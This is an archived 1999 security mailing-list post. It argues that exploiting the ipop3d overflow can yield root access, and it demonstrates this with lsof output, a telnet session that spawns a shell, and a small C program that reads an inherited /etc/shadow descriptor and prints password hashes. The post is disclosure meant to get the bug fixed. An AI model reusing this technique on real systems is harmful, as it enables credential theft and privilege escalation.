On Tue, 6 Apr 1999, Stefan Rompf wrote: > Hello Michal, > > At 01:41 07.03.99 +0100, you wrote: > > >Exploited overflow in ipop3d could be used to gain superuser access (the > >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid). > > Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage: > > If the effective user ID of the process calling setuid() is > the super-user, the real, effective, and saved user IDs are > set to the uid parameter. > > Linux behaves the same way, IMHO this is defined in POSIX. > But, (un)fortunately when exploiting ipop3d I found something like this: Grabarz:~emsi# lsof -n | grep 1190 sh 1190 emsi cwd DIR 8,1 1024 2 / sh 1190 emsi rtd DIR 8,1 1024 2 / sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-linux.so.1.9.5 sh 1190 emsi mem REG 8,1 11493 79564 /lib/libtermcap.so.2.0.8 sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.so.5.4.33 [...] sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow Shel spawned via ipop3d explotation (no bonus -- no exploit core) inherits opened fd :) So we may do something like this: emsi:~emsi# telnet grabarz 110 Trying 192.168.0.19... Connected to grabarz. Escape character is '^]'. +OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRCat_private) at Fri, 9 Apr 1999 15:19:33 +0000 ( ) user emsi +OK User name accepted, password please pass qpqp01 id; uid=1002(emsi) gid=100(users) groups=100(users) : command not found bash -i; bash$ cd ~emsi cd ~emsi bash$ bash$ cat p.c cat p.c char buf[255]; lseek(3,0,0); read(3,buf,255); printf("Be my guest:\n%s\n",buf); } bash$ bash$ gcc p.c gcc p.c bash$ ./a.out Be my guest: root:csKcGWMEUMGUs:10539:0::::: halt:*:9797:0::::: operator:*:9797:0::::: shutdown:*:9797:0::::: sync:*:9797:0::::: bin:*:9797:0::::: ftp:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: mail:*:9797:0::::: postmaster:*:9797:0::::: newż¤ţ^ ` bash$ bash$ That's only example... It proofs that exploiting ipop3d could be usefull to obtain root (or any other account) access and that the vulnerability should be fixed. P.S. Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (ty lamo, czy wkońcu podeślesz mi ten txt co mi obiecałeś? ;). -- ___________________________________________________________________________ M.C.Mar An NT server can be run by an idiot, and usually is. emsiat_private "If you can't make it good, make it LOOK good." - Bill Gates Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:46 PDT